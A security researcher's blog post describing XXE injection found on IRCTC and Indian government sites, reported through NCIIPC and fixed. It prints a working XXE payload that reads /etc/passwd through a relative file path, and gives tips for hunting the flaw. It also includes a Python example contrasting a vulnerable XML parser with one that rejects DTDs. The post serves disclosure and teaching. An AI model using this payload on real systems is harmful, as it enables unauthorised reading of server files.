Exploiting IRCTC along with a few other government domains through XXE

Swapmaurya
Published in System Weakness
4 min read, May 1, 2022

In this blog, I give an insight into XXE (XML External Entity) injection and a practical attack case study where I made responsible disclosures to the Indian Government through NCIIPC back in 2021.

Why does an XXE attack persist in a web application or any other software that has an XML parser? XXE is not an issue that can be resolved in XML itself; rather, it is a misconfiguration that is not handled while defining the XML parser. Because of that weak parser configuration, web applications that accept XML data from the user get exploited.

For a detailed insight into the how, what and why of XXE, refer to the following articles: PortSwigger, OWASP, Acunetix.

Back in 2021 there was news around the Internet that data from multiple companies had been breached, so I thought it was time to help defend against this before it was too late for some other company to get compromised. For this, I chose our own government domains to secure, which also have a responsible disclosure policy through which we can report any security issue that impacts the confidentiality and integrity of a website.

I came across this XXE while looking for issues on a private program and thought that if it is present here, it could also be present on multiple domains across the Internet. To discover the same technology elsewhere I used multiple methods, such as Google dorks and several search engines (DuckDuckGo, Yandex, Bing, Yahoo). After some trial and error I found a number of .gov domains plus the IRCTC website with the same configuration and tried the exploit on all of them; only a few were exploitable, and the IRCTC domain was among them.

Basically, XXE is present where user input is accepted and processed at the backend to produce output that is returned to the user. There is also the common error-based XXE, where injecting the malicious XXE payload throws an error that contains the requested data.

After going through multiple resources over the Internet and referring to the PayloadsAllTheThings syntax for XXE, I was still not able to fetch the file:///etc/passwd data. After a few more trial-and-error attempts, I finally got the exploit code working by backtracking up the path with a relative file: URI (the ../ segments in the exploit code).

Proof of Concept:

Exploit Code:

<!DOCTYPE xxe [<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:./../../../../../etc/passwd" >
]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>swap@test.com</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>

Using the above exploit we are able to fetch system files, which is enough to demonstrate the vulnerability. Without any further delay I created a bunch of submissions to NCIIPC, which were acknowledged by the team within a week. All of these reports were sent between Feb and Mar 2021, and all of the issues have since been fixed by the NCIIPC team.

Acknowledgements for Responsible Disclosure

The conclusion of the above case study is that user input should never be trusted under any circumstances, because most vulnerabilities arise from the client side and can lead to critical issues. Keeping this in mind, the SDLC should place strict restrictions on the configuration of the XML parser while defining or building any feature that ingests user input to provide a service.
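To make the parser-configuration point concrete, here is an added example (my own code written for this article, not part of the original disclosure or of any affected site) using Python's standard-library expat parser. It rebuilds a request of the same shape as the Autodiscover payload above, but points the entity at a constructed temporary file instead of /etc/passwd, and then parses it twice: once with a resolver that opens whatever path the document names (the weak configuration), and once with a parser that refuses any DOCTYPE, which removes external entities and entity-expansion bombs before they are parsed. The function names, SchemaCollector and the SECRET_CONTENT sample are my own assumptions; the defusedxml package takes a similar approach by rejecting entity declarations and external references for you.

```python
"""Added example: the XML parser misconfiguration behind an XXE, shown with
Python's stdlib expat parser. Not code from the original post."""
import os
import tempfile
import xml.parsers.expat as expat
from urllib.parse import urlparse

# Constructed stand-in for /etc/passwd so the example never touches real files.
SECRET_CONTENT = "root:x:0:0:root:/root:/bin/bash\n"


def write_secret_file() -> str:
    """Create a throw-away file that the payload will try to read."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write(SECRET_CONTENT)
    return path


def build_payload(target_path: str) -> bytes:
    """Same shape as the Autodiscover request in the write-up: an external
    general entity declared in the internal DTD subset, then referenced in
    an element whose text is echoed back. target_path is our temp file."""
    return (
        "<!DOCTYPE xxe [<!ELEMENT name ANY >\n"
        f'<!ENTITY xxe SYSTEM "file://{target_path}" >\n'
        "]>\n"
        '<Autodiscover xmlns="http://schemas.microsoft.com/exchange/'
        'autodiscover/outlook/responseschema/2006a">\n'
        "<Request>\n"
        "<EMailAddress>swap@test.com</EMailAddress>\n"
        "<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\n"
        "</Request>\n"
        "</Autodiscover>\n"
    ).encode()


class SchemaCollector:
    """Collects the text of <AcceptableResponseSchema>, the element the
    write-up's payload uses to carry the entity reference."""

    TARGET = "AcceptableResponseSchema"

    def __init__(self) -> None:
        self.value = ""
        self._inside = False

    def start(self, name, attrs):
        if name == self.TARGET:
            self._inside = True

    def end(self, name):
        if name == self.TARGET:
            self._inside = False

    def text(self, data):
        if self._inside:
            self.value += data


def extract_schema(xml_bytes: bytes, *, hardened: bool) -> str:
    """Parse an Autodiscover request and return the schema element's text.

    hardened=False mirrors the weak configuration: the parser is allowed to
    resolve external entities, and the resolver opens whatever file the
    document names. hardened=True refuses any DOCTYPE, so no entity can be
    declared at all (no external entities, no expansion bombs)."""
    collector = SchemaCollector()
    parser = expat.ParserCreate()
    parser.StartElementHandler = collector.start
    parser.EndElementHandler = collector.end
    parser.CharacterDataHandler = collector.text

    if hardened:
        def reject_dtd(name, sysid, pubid, has_internal_subset):
            raise ValueError("DOCTYPE declarations are not accepted")
        parser.StartDoctypeDeclHandler = reject_dtd
    else:
        def resolve_external_entity(context, base, system_id, public_id):
            # The flaw: the file path comes straight from attacker-controlled XML.
            with open(urlparse(system_id).path, "rb") as fh:
                data = fh.read()
            sub = parser.ExternalEntityParserCreate(context)
            sub.Parse(data, True)  # entity text flows into CharacterDataHandler
            return 1
        parser.ExternalEntityRefHandler = resolve_external_entity

    parser.Parse(xml_bytes, True)
    return collector.value


def run_demo() -> dict:
    """Run the payload through both configurations; return what each produced."""
    path = write_secret_file()
    try:
        payload = build_payload(path)
        leaked = extract_schema(payload, hardened=False)
        try:
            extract_schema(payload, hardened=True)
            hardened_result = "parsed"
        except ValueError as exc:
            hardened_result = f"rejected: {exc}"
    finally:
        os.remove(path)
    return {"weak_parser_output": leaked, "hardened_parser_output": hardened_result}


if __name__ == "__main__":
    for key, val in run_demo().items():
        print(f"{key}: {val.strip()}")
```

Running the script shows the weak parser echoing the temp file's content back inside the schema element, exactly the behaviour the proof of concept relies on, while the hardened parser stops at the DOCTYPE before any entity is declared. Rejecting the DTD outright is the simplest rule to enforce in a code review: if a feature does not need DTDs, the parser should never be allowed to see one.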

Key Takeaways

Look around the workflow of the web application and check whether you can manipulate the request by changing the Content-Type from JSON to XML, and see the results. Try changing the request method. Use the backtracking or directory traversal method for the file path. In most cases the endpoints vulnerable to this attack are login workflows, data request endpoints, and features that download, process or convert data from one format to another.

I hope this case study helps to better understand the attack vectors and the impact of exploitation if proper care is not taken at the ground level of the SDLC. Thanks to all of you who are reading this, and I hope this write-up helps everyone who has not yet figured out this vulnerability class to understand it better.

Stay updated with me on Twitter for more interesting blogs.
